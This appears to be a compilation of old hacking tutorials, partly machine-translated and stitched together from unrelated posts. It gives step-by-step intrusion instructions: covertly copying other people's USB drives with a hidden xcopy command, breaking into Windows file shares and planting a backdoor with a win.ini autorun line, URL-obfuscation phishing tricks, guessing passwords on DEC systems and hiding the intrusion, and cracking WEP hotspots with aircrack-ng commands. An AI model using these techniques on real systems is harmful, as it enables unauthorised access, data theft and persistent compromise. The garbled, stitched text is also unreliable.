The above command will copy the entire contents of the flash disk drive G: to the folder E: \ XCP
Without confirmation, if the error passed to the next file. The main responsibility and sip wrong.
For 1 Gb flash (with the USB driver v2.0 active) only takes about 58 seconds.

If you want to directly, without the files, do so:
Start> Run> type:

start / min xcopy G: \ E: \ XCP / S / Y / I / R / D>> flash.txt
Enter

Later that would flash ngopy other people, live press WinKey (between Ctrl and Alt on the left) + R, then Enter

source : ven0mday.blogspot.com/

Exploiting File and Print Sharing

Windows has an option called file and print sharing. You can use this
option in order to "share" drive and printers, which means giving access to
files and printers to other people - people on your own network, specific
IPs or even the whole world. When you turn this option on, you leave an open
port (port number 139) that accepts connections and understand the "NetBIOS
protocol", a set of commands (a "language") used to access remote file
and print sharing servers, so that other computers can access the files or
printers you decided to share.
Now sometimes in a small company LAN this could be extremely useful. For
example, instead of having a seperate printer for each computer, there's just
one central printer in a computer that allows file and print sharing. But if
you are using file sharing in your home computer (We've seen many people
that have this option turned on and don't even know what it means! Poor
souls) that is connected to the Internet, that could be quite dangerous because
anyone who knows your IP can access your files or printers you're sharing.
If you don't know if file sharing is active in your computer just go to the
control panel and select the Network icon. Now you should see a box where you
can see all the network software that you have installed, such as TCP/IP
(Transfer Control Protocol / Internet Protocol. This is the protocol that is
used to transfer data packets over the Internet. A protocol is like a human
language - if two computers understand it, they can communicate) and probably a
dial-up adapter (so you could transfer TCP/IP packets over a PPP connection.
PPP, or Point to Point Protocol is the protocol used in dial-up connections),
check if you have a line called File and Printer Sharing.
If you have this then you have sharing activated, to turn it off just uncheck
the "I want to be able to give others access to my files" and do the same to
the other. Let's return to the ports thing. Remember port 139? The File Sharing
Port is port 139 and it's called NetBIOS Session Service port. When you have
this option enabled you also have 2 other ports open but they use the UDP
protocol instead of the TCP protocol. These ports are 137 (Name Service) and
138 (Datagram Service). Now if you know anything about DoS attacks (known to
many as nukes) port 139 should sound familiar... There's a kind of DoS (stands
for Denial of Service) attack called the OOB nuke (OOB stands for Out Of Band)
or "winnuke" that sends an OOB packet to port 139 and makes Windows lose
connection and drop the user to "blue screen mode". If you wish to know more
about DoS attacks, I suggest that you wait for the DoS attacks tutorial (at the
time this tutorial was written, the DoS attacks tutorial didn't exist yet.
However, by the time you read it it might already be available, so you can try
and get it from http://blacksun.box.sk).
Okay, enough said, let's get on with it.
----------- Getting In -----------

I'm going to explain two ways of breaking into a Windows box that has file
sharing enabled. Just to see how unsafe Windows is, the programs you'll need
come with Windows. isn't that ironic? Okay, of course they come with Windows!
Would you actually expect Microsoft to release an OS that supports sharing
without the tools to access shares?
Now, of course, you can hack file and print sharing through Unix as well.
We'll get to that in the end. Right now we're dealing with Windows here.
Both ways will have equal starts but then in one of the ways you'll keep
typing commands, and in the other way you'll use a GUI (for the ppl who
don't know GUI stands for Graphical User Interface) software. The programs
that you need are called Nbtstat.exe and Net.exe you can find it in the windows
directory. These programs run from the MS-DOS prompt. To see the help menu
for nbtstat type nbtstat /? And for net type net /?. Now if you are using
Windows 95 you can have the option NetBios Over TCP/IP disabled and with
that disabled nbtstat won't work and will display a error message like this
one: "Failed to access NBT driver" without the quotes. So if this error
message comes up just go to the control panel, and select the network icon. Now
select TCP/IP and choose properties, in the TCP/IP properties box select the
NetBIOS sheet, and enable it checking the box that shouldn't have a cross. If
you have Windows 98 the error message shouldn't be displayed unless you have
some kind of a port blocker on port 139 (such as Nukenabber). A lot of people
have these things on to detect OOB nuke attempts (usually newbies that can't
use a firewall or lamers that never attempted to. Hopefully not you).
Now, you must be thinking that enabling NetBIOS over TCP/IP opens the same
three ports, that you use to access a computer. That's true, because if you
want to use the same protocol you'll need to use the same default ports, or
you can use a terminal emulator to connect to port 139 and instead of using
the application I mentioned to type the protocol commands, but that's a real
pain in the ass. Remember that there isn't any problem with the file sharing,
because you don't have it enabled, you've just got the ports open (you are
just vulnerable to the DoS attack, you can use a firewall or get a patch for
it at www.theargon.com (click on defenses and find the OOB patch), but I don't
know if that would block the incoming data from the host that you are trying
to get in).

Now that you have your NbtStat.exe ready to roll, choose the computer. You
can use the hostname or the IP but you need to use different switches (I'll get
to that in a second).
Let's suppose for a second that this computer's hostname is
Mycomputer.MyIsp.com and the IP is 194.65.34.3. The first thing you need to do
is to see if the computer has file sharing enabled. How can you do that? It's
easy. Type:
nbtstat -a hostname
In this case nbtstat -a Mycomputer.MyIsp.com, but if you want to use the IP
you need to type:
nbtstat -A IP
In this case nbtstat -A 194.65.34.3
That's strange because DOS isn't case sensitive... but that's how things work
(I guess that although DOS isn't case sensitive, this rule doesn't apply to
command parameters. Makes more sense than the opposite).
Now you might receive two different kinds of replies. One that just says
"Host Not Found". If you get this message, you can give up trying to access
the share part of that computer, because that computer hasn't got the NetBIOS
protocol enabled, or you mistyped the hostname or IP. On the other hand, if
you get a table with names, type of sharing and status, it might be your lucky
day! Now if you get this table you're half way in. But remember that
sometimes you will get that table but you will not be able to do anything
productive with it, because the computer won't be sharing anything.
The table should look something like the one that is below:

Name Type Status
-----------------------------------------------------------------------------
Host <20> UNIQUE Registered
Hostbug <00> GROUP Registered
Host machine <03> UNIQUE Registered
-----------------------------------------------------------------------------

If you want to access your own sharing table just type nbtstat -n

-----------------------------------------------------------------------------
The values in the brackets can be:
00 base computernames and workgroups, also in "*" queries
01 master browser, in magic __MSBROWSE__ cookie
03 messaging/alerter service; name of logged-in user <--- This one is cool too ---
20 resource-sharing "server service" name <--- Check this one ---
1B domain master-browser name
1C domain controller name
1E domain/workgroup master browser election announcement [?]
-------------------------------------------------------------------------------
I'll talk about messaging/alert service later, if you want to read about it
now, just scroll down until you find Messaging/Alert Service.
-------------------------------------------------------------------------------
So if the value in the box is 20 (by the way, the values are displayed
in hex code) it means that there is sharing enabled. So now how can someone
get in? Easy. First you need to create an entry in your Lmhosts file (can be
found at c:\windows\Lmhosts. There is also an example file at
c:\windows\Lmhosts.sam. In Windows NT, these files can be found at
c:\WinNT\Lmhosts and c:\WinNT\Lmhosts.sam). If you don't have the Lmhosts file,
just create it. Read all the information in the sample file file below.

--- Lmhosts.sam file ---
# Copyright (c) 1993-1995 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows
# NT.
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the comptername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
#
\machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname \0x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the
include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.

To create an entry just open the Lmhosts file in your favorite word
processor and enter your target's IP, press tab and enter the share name
(the one that is listed in the name field). Save the file and exit.
Now the are two methods to access the remote shares you're after: the
easy way and the cool way.

--- The easy way (GUI) ---

If you don't want to have any more trouble just press start, click find
and select find computer. Enter the target's IP address. If your Lmhosts entry
is correct, it will show the computer you want in the search window. Just click
on the computer icon, and start browsing through that computer like you were
browsing your own computer.

--- The cool way ---

Now it's time to get to know the net.exe program. To access the help menu
just type:
net /? (in a dos Window).
I suggest to redirect all the help to a file and then read it
(use net /? > somefile.txt to redirect all output to somefile.txt and overwrite
it, or net /? >> somefile.txt to append the output to the file without deleting
it). You can also do net option /? to get more help about that option. To
access the share, you create a virtual drive that will be the share in the
other host.
In order to do this you will need to enter:
net use drive \\[ipaddress]\[sharename]

Where:

- drive is the drive letter you want. For example f: g: z:
- ipaddress is the target host's IP

- sharename is the name of the share (remember the table we discussed about
before?)

After doing this you just need to type drive: and then browse the new drive
using Ms-DOS like if you were in your own hard disk (for example, type:
f:
If your new virtual drive has been assigned the letter f).

Example:

Lets say that you coded a *really cool* backdoor, and you want to run on a
computer that has share enabled, the share name is Flintstone and the ipaddress
is 145.42.23.14 .

c:\>net use f: \\145.42.23.14\Flinstone

Now you would just need to copy the backdoor to the new virtual
drive.

c:\>copy backdoor.exe f:\backdoor.exe

----- First Version Text ------

Then you would just change drive and run the backdoor.

c:\>f:
f:\>backdoor.exe

And the backdoor is loaded, so now you can use it to access this computer.

--------------------------------
I'm deeply sorry, but what is written between the ----First Version Text---
is wrong.
Using what is there what probably would happen was installing the backdoor
in your own computer and not in the target host. Thanks to Kimmo from the
a-Men Group that correct me.
What you really need to do is to copy the backdoor.exe file to the share,
and then edit the win.ini file adding the line:

run=%SystemRoot%\backdoor.exe

---------------------------------------------------------------------------------
NOTE: Why %SystemRoot% ?
We need to use %SystemRoot% instead of F:, because F: is a virtual drive so
in the the host that drive could not exist, so you use the variable
%SystemRoot% that will return the correct drice.
---------------------------------------------------------------------------------

Of course, you can also put the backdoor in other places, such as
c:\windows\winstart.bat (enter the line %SystemRoot%\backdoor.exe as a new
blank line). If there is no such file, create it.

-----------------------
Messaging/Alert Service
-----------------------

What's this feature? It doesn't let you access the files for certain, but
it's kinda fun, because what it does is send a message, in Message Box Format
to the other host. Watch the face of the guy that is on the computer when he
sees a message box saying "Error: User To Stupid". However, you need to
remember that your host will be shown in the message box, but if you spoof your
host, you can have a good laugh with this.
When using this feature you also need to create a new entry in your Lmhosts
file. Remember that this can only be used in a LAN network such as a school LAN
with your friends, just to see their faces, nothing more. Even if you wanted to
send it over the Internet you couldn't because it uses a broadcast system, and
when any broadcasted packets get to a router they are immediately deleted
(security reasons. Off the topic of this tutorial).
To send a message to the other computer that computer needs to have a <03>
value. As you can see in the table somewhere in the middle of the file, <03
says:
03 messaging/alerter service; name of logged-in user <--- This one is cool
too ---
So if your target computer has this turned on you can send a message by
typing:
net send sharename message
If you are in an LAN and don't want people to mess with you, type:
net stop messenger
Doing this you stop the msg service, so you won't be able to send or receive
messages using the net send syntax. If you want to enable it again, type:
net start messenger
Now you'll be able to send and receive messages again.

Appendix A: Accessing Windows shares from Unix
----------------------------------------------
The easiest way is to use an X-Windows program called
LinNeighborhood, which can be downloaded from http://www.bnro.de/~schmidjo/.
However, you can also do that from your console or xterm window, by using the
smb commands. To learn more, read the man pages of the following commands:
smbclient smbmnt smbmount smbprint smbumount

Appendix B: Finding sharing hosts
---------------------------------
Suppose you're an admin that wants to scan his network for vulnerable hosts.
Suppose you're a bored cracker that wants to find possible targets. In both
cases you'd want to have a shares scanner to do the job for you.
You can use a shares scanner to scan whole subnets and look for vulnerable
hosts for you. Get Legion or NbtScan from packetstorm.securify.com.

Appendix C: Password-Protected shares
-------------------------------------
Are you an admin that wants to test how strong his password protected shares
are? Are you a cracker that came across a password-protected share and don't
know what to do? You could try to get a brute-force sharing password cracker
that'll try passwords for you until it finds the correct one. Cain is one such
program, that also has some other features that you might want to check out.

Appendix D: Detecting Sharing Attacks
-------------------------------------
Sharing attacks are usually pretty easy to detect (unless the attacker is
spoofing or performing his attack from another host, thus making it appear as
if the other host is really the attacker). The simplest program for the job is
Lockdown 2000 (from www.lockdown.com). However, it is quite buggy and doesn't
always perform well. You can also try Notron AtGuard (www.norton.com) - I
believe it can also detect sharing attacks, although I havn't tested it yet.
However, if you're going for the real thing, you should try and get a good
firewall or intrusion detection system. My personal favorite for Unix systems
is ipchains (search linux.box.sk, freshmeat.net or any of your other
favorites), while for Windows systems I recommend Firewall-1 (search the net,
you should be able to come across it pretty quickly).

Appendix E: An Easier Way to Access Shares
------------------------------------------
Got the target's IP address? Good. Got the share name? Good. Now hit start,
then hit run, and then type:
//ip-address(or hostname)/sharename
For example: //65.4.78.203/someshare
You will be able to access the share using an interface similar to what you get
when you double-click on the "my computer" icon, and get rid of the need to
assign a virtual drive.

http://blacksun.box.sk

hacking website - url hack

Recently, many smiled and Microsoft got angry at a spoof of its Knowledge Base articles posted on a URL starting with "http://www.microsoft.com." Emails went around and people clicked on the link, possibly before looking closer at it. Surprised by the content, they may have checked the URL again, noticing the other "www"-like string in it and figured out it must have something to do with the real host; forwarded the email to friends and then returned to their work.

Today we will look closer at URLs and the associated security implications. "Interesting" ways of using them have been known by spammers for a while, but now the KB spoof and the February issue of Crypto-Gram have made the Internet community more aware of what URLs can do.

Although most Internet users will associate URLs with WWW addresses, or perhaps FTP, Uniform Resource Locators are more general in scope. URLs are standardized in RFC1738, and in their most generic form, they are defined as

:
The best-known scheme is the Common Internet, in which the is the name of a protocol and the is defined as:

//:@:/
in which only the host part is mandatory. The ":" and "@" characters have a special meaning and thus the server can parse the entire string. If a user and a password are provided, the host part only comes after the @ character. In the KB spoof mentioned earlier, the link was

http://www.microsoft.com&item=q209354@www.hwnd.net/pub/mskb/Q209354.asp
Understandably, it is no longer available. (In case you find a copy elsewhere, be aware that the page uses strong language and might trigger some content scanners as well.) As you have guessed, the real host of the page was www.hwnd.net. The string "www.microsoft.com" in this case is just a bogus username that is ignored by the web server.

Although perfectly valid syntactically, the above usage can be considered as having security relevance. While no technological resource is affected, the attack is targeted at the other (and often ignored) half of the picture: ourselves. At the end of most Internet nodes, beyond network cards, modems and computers, there are human users who, consciously or not, make security decisions every time they decide to trust what they see on the screen.

Trust is a fundamental security value. Crafting the URL as above exploits the trust we have in our understanding of what a URL is like and in whoever provided us the link. It also exploits the fact that our attention is focused on the content frame and not on the location although they are equally important in a decision of trust. In SSL-protected sites, the latter is in part taken care of by the browser, which compares the domain with the information in the SSL certificate; otherwise mere encryption would not provide much value if the destination is bogus.

Concealment
The URL analyzed above is just superficially hiding its real destination. Let us look further into better ways of doing this. For some reasons (probably caused by the internal handling), some operating systems operate with IP addresses not only in the form we are used to, aaa.bbb.ccc.ddd, but also as the decimal equivalent.

The above generic address can also be written as the decimal value of aaa*256^3+bbb*256^2+cccc*256+ddd. Thus, 3633633987 is 216.148.218.195 (belonging to www.redhat.com). You can copy and paste 3633633987 into your browser, and you will find yourself browsing Red Hat's main site. The above works with Internet Explorer 5.x and also with Lynx on Linux, but I have not tested all operating systems, so your mileage may vary. Some applications may complain of invalid URLs if they parse the domain name for periods, but if you experiment with a few applications, including standard utilities like ping, you should be able to figure out whether the OS itself supports this usage.

Thus more obfuscation could be obtained by creating a URL such as http://www.toronto.com:ontario@3633633987 which still goes to Red Hat. Surfers are used to seeing strings of digits in a URL because many sites store the HTTP SessionID in the URL instead of in a cookie, so the above would not appear particularly suspicious. The password can be absent, so we end up having http://www.toronto.com@3633633987, "easy to read, easy to misunderstand" at a first glance.

Now, for the final touch, we can use a bit of HTML knowledge: the anchor tag allows the display text for a link to be different than the target itself, so the above link can appear as http://www.toronto.com. In IE 5.5, hovering with the mouse over it displays the number only in the status bar, not very indicative of a wrong target, so only clicking on it would show us the real target.

Yet another way of exploiting trust is by using the indirection provided by genuine websites. A number of well-known sites track if their visitors follow external links by first creating the links of the form http://www.thisisarespectablesite.com/outsidelinks/http://externalsite, trapping the request at the server side and then redirecting the user to the real destination.

The problem with this approach is that anyone can use their indirection, combined with URL obfuscation, in order to provide more legitimacy to false URLs. What this can lead to depends both on the attacker and on the victim. The HTTP REFERER field, limited as it is, can be of some value to reduce abuses, but not all sites seem to use it.

And if the above was not enough, the characters in the real destination can be obfuscated themselves through URL and Unicode encoding. so only the hex codes will be visible. URL encoding is required for many special characters, but can be applied to regular alphanumeric characters as well.

None of the above is new to knowledgeable spammers, but will likely be quite successful as an attack targeted to the average unsuspecting user.

One-click Attacks
Let's explore the security implications of the URL even further. One of the "standard" attacks would be to cause a buffer overflow. As far as the browsers go, however, by now this would be a very beaten path; many a hacker has tried to crash IE or Netscape. What about other protocols? Indeed, what other protocols are recognized on a machine?

To find out the answer for a Windows box, I turned to looking into the registry. The following keys contain such information: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler and those keys under HKEY_CLASSES_ROOT\Shell that have a subkey named "URL Protocol." (You will have to do some searching for those in the latter category, but it does not take long.)

The search results proved interesting: apart from the expected ftp://, http://, https://, mailto://, news://, pnm:// and several others, I found some schemes I had never heard of before, such as msee://. A quick experiment showed that it is the scheme used by Microsoft Encarta, perhaps to refer to articles inside the encyclopedia. Whether Encarta is safe from buffer overflows and, if not, whether they can be practically exploited, well, this is something that would need investigation.

The story repeated with other URL schemes that were installed by various applications (such as copernic:// owned by the Copernic search tool). There have been other interesting discoveries, but have a look for yourself.

Apart from the possibility of remote exploitation of applications that are not otherwise remotely accessible, even more discomfort is caused by the absence of any administrative interface allowing inspection of the associations between a URL scheme and the application using it (apart from a very scope-limited dialog in Internet Explorer under Tools/Options/Programs which only displays a handful of standard protocols).

It turns out that registering a new URL scheme in Windows is trivial and the change takes place immediately. It is done by adding the necessary registry entries as described in this MSDN documentation. Unfortunately, this also means this can be done by scripted viruses such as KakWorm (which are executed by simply viewing an email on a vulnerable system).

Associating a benign protocol with a dangerous command is, well, dangerous. Granted, this is not a URL-specific attack. It can be done using file associating as well, but the risk is still there, and the existence of other attack paths does not mean this one will not be exploited. And, of course, nothing forces an attacker to use only the techniques described here.

Until there are more mechanisms to inform and protect us from such attacks, the best defense is to be cautious, and do not follow directions in emails you cannot trust. Sometimes, you just feel something isn't right.

Accessing Vista Tips If forgotten

Adjust font size: Zoom Zoom fonts fonts
photo news articles If you use Windows Vista operating system, but forget or lose notes Vista Administrator password, so do not worry. You can still access the Vista system and me reset the administrator password with a few easy steps below.

* Start computer, does not need to wait load Windows. Click "F8" on the keyboard, before the Windows Vista start-up. Then tertampil will list some options for the process.
* Select Start computer in "Safe Mode"
* Open the Start menu.
* Open the "Control Panel" (from the start menu)
* Select "User Accounts and Family Safety" in the pop-up window Control Panel
Section * Click the link "Change Your Windows Password" under the section "User Accounts"
* Click "Remove Password", verify and submit.
* Restart the computer normally, does not need to press F8 again.
* To reset the password, you can access the "User Accounts and Family Safety" again, and then click "Change Your Windows Password", enter the password you want, verify and submit.

source : detiknet.com

Basics of Hacking

in this article you will learn how to log in to dec's, logging out, and all the
fun stuff to do in-between. All of this information is based on a standard
dec system. Since there are dec systems 10 and 20, and we favor, the dec 20,
there will be more info on them in this article. It just so happens that the
dec 20 is also the more common of the two, and is used by much more interesting
people (if you know what we mean...) Ok, the first thing you want to do when
you are receiving carrier from a dec system is to find out the format of login
names. You can do this by looking at who is on the system. Dec=> ` (the
'exec' level prompt) you=> sy sy is short for sy(stat) and shows you the system
status. You should see the format of login names... A systat usually comes up
in this form: job line program user job: the job number (not important
unless you want to log them off later) line: what line they are on (used to
talk to them...) These are both two or three digit numbers. Program: what
program are they running under? If it says 'exec' they aren't doing anything
at all... User: ahhhahhhh! This is the user name they are logged in under...
Copy the format, and hack yourself out a working code... Login format is as
such: dec=> ` you=> login username password username is the username in the
format you saw above in the systat. After you hit the space after your
username, it will stop echoing characters back to your screen. This is the
password you are typing in... Remember, people usually use their name, their
dog's name, the name of a favorite character in a book, or something like this.
A few clever people have it set to a key cluster (qwerty or asdfg). Pw's can
be from 1 to 8 characters long, anything after that is ignored. You are finally
in... It would be nice to have a little help, wouldn't it? Just type a ? Or
the word help, and it will give you a whole list of topics... Some handy
characters for you to know would be the control keys, wouldn't it? Backspace on
a dec 20 is rub which is 255 on your ascii chart. On the dec 10 it is cntrl-h.
To abort a long listing or a program, cntrl-c works fine. Use cntrl-o to stop
long output to the terminal. This is handy when playing a game, but you don't
want to cntrl-c out. Cntrl-t for the time. Cntrl-u will kill the whole line
you are typing at the moment. You may accidently run a program where the only
way out is a cntrl-x, so keep that in reserve. Cntrl-s to stop listing, cntrl-q
to continue on both systems. Is your terminal having trouble?? Like, it
pauses for no reason, or it doesn't backspace right? This is because both
systems support many terminals, and you haven't told it what yours is yet...
You are using a vt05 (isn't that funny? I thought I had an apple) so you need
to tell it you are one. Dec=> ` you=> information terminal or... You=> info
ter this shows you what your terminal is set up as... Dec=> all sorts of shit,
then the ` you=> set ter vt05 this sets your terminal type to vt05. Now let's
see what is in the account (here after abbreviated acct.) That you have hacked
onto... Say => dir short for directory, it shows you what the user of the code
has save to the disk. There should be a format like this: xxxxx.Ooo xxxxx
is the file name, from 1 to 20 characters long. Ooo is the file type, one of:
exe, txt, dat, bas, cmd and a few others that are system dependant. Exe is a
compiled program that can be run (just by typing its name at the `). Txt is a
text file, which you can see by typing=> type xxxxx.Txt do not try to=> type
xxxxx.Exe this is very bad for your terminal and will tell you absolutly
nothing. Dat is data they have saved. Bas is a basic program, you can have it
typed out for you. Cmd is a command type file, a little too complicated to go
into here. Try => take xxxxx.Cmd by the way, there are other users out there
who may have files you can use (gee, why else am I here?). Type => dir <*.*>
(Dec 20) => dir [*,*] (dec 10) * is a wildcard, and will allow you to
access the files on other accounts if the user has it set for public access.
If it isn't set for public access, then you won't see it. To run that program:
dec=> ` you=> username program-name username is the directory you saw the file
listed under, and file name was what else but the file name? ** You are not
alone ** remember, you said (at the very start) sy short for systat, and how
we said this showed the other users on the system? Well, you can talk to them,
or at least send a message to anyone you see listed in a systat. You can do
this by: dec=> the user list (from your systat) you=> talk username (dec
20) send username (dec 10) talk allows you and them immediate
transmission of whatever you/they type to be sent to the other. Send only
allow you one message to be sent, and only after you hit . With send,
they will send back to you, with talk you can just keep going. By the way, you
may be noticing with the talk command that what you type is still acted upon by
the parser (control program). To avoid the constant error messages type
either: you=> ;your message you=> rem your message the semi-colon
tells the parser that what follows is just a comment. Rem is short for
'remark' and ignores you from then on until you type a cntrl-z or cntrl-c, at
which point it puts you back in the exec mode. To break the connection from a
talk command type: you=> break priv's: if you happen to have privs, you can do
all sorts of things. First of all, you have to activate those privs. You=>
enable this gives you a $ prompt, and allows you to do this: whatever you can
do to your own directory you can now do to any other directory. To create a
new acct. Using your privs, just type => build username if username is old,
you can edit it, if it is new, you can define it to be whatever you wish.
Privacy means nothing to a user with privs. By the way, there are various
levels of privs: operator, wheel, cia wheel is the most powerful, being that
he can log in from anywhere and have his powers. Operators have their power
because they are at a special terminal allowing them the privs. Cia is short
for 'confidential information access', which allows you a low level amount of
privs. Not to worry though, since you can read the system log file, which also
has the passwords to all the other accounts. To de-activate your privs, type
you=> disable

when you have played your greedy heart out, you can finally leave the system
with the command=> logout this logs the job you are using off the system
(there may be varients of this such as kjob, or killjob). By the way, you can
say (if you have privs) => logout username afl kills the username's
terminal.

There are many more commands, so try them out. Just remember: leave the
account in the same state as you foundt. This way they may never know that
you are playing leech off their acct.
this article written by: the Knights of Shadow

Entering Hotspot protected with WEP

For that you have a laptop instead of AXIO to the top and equipped Wireless, let us practical beauty "air property" with a little learning. Do not just for typing papers and watching miyabi.

Booting with BackTrack V2.0 (or v3.0), make sure you reach the Hotspot
Card best use Atheros. If no, alternative: 3Com 3CRPAG175B, 3Com 3CRXJK10075, DLINK DWL-G630 Rev C, Linksys WPC55AG, TrendNET TEW-441PC, TrendNET TEW-443PI, TP-LINK TL-WN610G
consol
airmon-ng stop ath0 \ ___ wireless monitoring and injection
airmon-start wifi0 ng /
airodump-ng ath0

Consider this example table:

BSSID PWR Beacons Data # H / S CH MB ENC Cipher AUTH ESSID
00:19:5 B: 5C: 62:92 9 57 5 0 6 54 WEP WEP REK-1
00:17:9 A: C0: 50:3 E 7 66 92 0 1 54 OPN Hall_G

etc..

airodump-ng-channel 6-bssid 00:19:5 B: 5C: 62:92-w results ath0 <- collecting data before cracking WEP. note on the table

consol
aireplay-ng-arpreplay-b 00:19:5 B: 5C: 62:92-h 00:19: D2: 45: D0: EB ath0 <- 00:19: D2: 45: D0: EB is the MAC-Address his
aircrack-ng results *. stamp <- time t Crack!
aircrack-ptw results-01.cap <- or this!

Use facilities WarDriving!

Running Windows XP SP 2 from Flashdisk

This paper describes how to run the operating system Windows XP SP 2 directly from the flash disk,
at the same time to run office applications, multimedia, Internet browsing, and repair the system error.

Microsoft explained that booting from a USB drive can not be done.
To bring as only function as storage media, for example, save the document. Mp3, or .3 gp

"USB-based mass storage devices can not be the primary hard disk storage solution on a regular system ..."
(http://www.microsoft.com/whdc/device/storage/usbfaq.mspx)

"Windows can not boot from an USB drive. If your computer supports booting from such devices,
you can load a boot loader to the USB device which starts Windows XP from the HDD. "
(http://groups.google.de/group/microsoft.public.windowsxp.basics/browse_thread/thread/5a5882d3391081b3/)

Not so the fact that indeed. For it is written this tutorial. p

-------------------------------------------------- --
Step 1: Is your computer can be booting from a USB?
-------------------------------------------------- --
To check whether your computer is booting from a USB can see this note:
1. Check the BIOS setup on the "Advanced BIOS Settings", usually there is the "boot menu Sequence" or
choice similar to that. Each of the BIOS installed on the motherboard has a menu that
different. Please refer to the manual of the motherboard, which usually included.
2. If the BIOS is not supported, please update the BIOS. Usually, the new motherboard output
always supports the feature "boot from USB."

Make test whether your computer is booting from a USB can:
1. Bring from the Windows format, with the format NTFS/FAT32
You can use a tool that can format a HPFormatTool bring from the Start Menu.
3. Computer shutdown.
4. Connect the USB drive without HUB. Enter the flash disk directly on the CPU, without the help cable.
5. Disconnect hard drive (disconnect the IDE / SATA and power from the motherboard)
6. Turn on the computer
7. BIOS setup and try to make booting from a USB Drive. If the BIOS does not successfully find the drive
with autodetect, not the problem. What is important is the BIOS may have been booting from a USB Drive.
8. Shutdown the computer, connect the hard drive back again, and bring pull from the CPU
9. Restart the computer

------------------------------------------------
Step 3: dumping Windows XP SP 2 to. ISO
------------------------------------------------
Open UltraISO> Create. ISO of Windows XP SP 2> Save> gave the name "WinUSBDrive.ISO"

---------------------
Step 4: Extract Files
---------------------
1. Open the file "WinUSBDrive.ISO" you have made, with UltraISO
2. Open the folder \ i386
3. Extract the following files to the desktop%% (though readily searchable)

TXTSETUP.SIF
DOSNET.INF
USB.IN_
USBPORT.IN_
USBSTOR.IN_

----------------------------------
Step 5: Unpacking files *. IN_
----------------------------------
1. Use the SDK CAB (Cabinet SourceDevelopmentKit) from the command-line (cmd.exe) to unpack content
files. IN_ where each file contains only one file. inf file
2. Copy files to the desktop CAB SDK
3. Start> Run> type: "cmd.exe / k cd desktop" (without quotation marks)> OK / Enter
Will display the command prompt:

C: \ Documents and Settings \% username% \ Desktop \>?

4. Type:

cabarc x USB.IN_
cabarc x USBPORT.IN_
cabarc x USBSTOR.IN_

You will find the following files:

usb.inf
usbport.inf
usbstor.inf

5. Delete files in the *. IN_%% desktop but not delete the file TXTSETUP.SIF
6. Let alone the Command Prompt open, I do not need to be closed.

---------------------
Step 6: Editing File
---------------------

To edit a file code / text with Notepad:

1. Open Notepad file.
2. Drag-drop files to be edited in Notepad.
3. Once finished, close Notepad. If there is confirmation of storage, select YES

The following is the main steps that should be done, so that Windows XP SP 2 can be installed to bring in

6-A) --- TXTSETUP.SIF

This file is in the early-LOAD through the installation CD Installer Windows XP SP 2.
USB devices are usually only considered as "input device" during installation.
I will change it to include support for media-storage drivers on the initial installation.

Make editing the file TXTSETUP.SIF such as the following instructions:

Note the line where the line should ditambahi and which should be removed.
The line marked "; insert this line" which means additional previously not in the original file
The line marked "; delete this line" means that the line should be deleted
The line marked "; add / change like this line" means that the case should be modified as

[BootBusExtenders.Load]
pci = pci.sys
acpi = acpi.sys
isapnp = isapnp.sys
acpiec = acpiec.sys
ohci1394 = ohci1394.sys
usbehci = usbehci.sys; insert this line
usbohci = usbohci.sys; insert this line
usbuhci = usbuhci.sys; insert this line
usbhub = usbhub.sys; insert this line
usbstor = usbstor.sys; insert this line

[InputDevicesSupport.Load]
usbehci = usbehci.sys; delete this line

usbohci = usbohci.sys; delete this line
usbuhci = usbuhci.sys; delete this line
usbhub = usbhub.sys; delete this line
usbccgp = usbccgp.sys
hidusb = hidusb.sys
serial = serial.sys
serenum = serenum.sys
usbstor = usbstor.sys; delete this line

[BootBusExtenders]
pci = "PCI-Bustreiber," files.pci, pci
acpi = "ACPI Plug & Play-Bustreiber," files.acpi, acpi
isapnp = "ISA Plug & Play-Bustreiber," files.isapnp, isapnp
acpiec = "Integrierter ACPI-Controllertreiber," files.none, acpiec
ohci1394 = "IEEE-1394-Bus-OHCI-konformer Anschlusstreiber," files.ohci1394, ohci1394
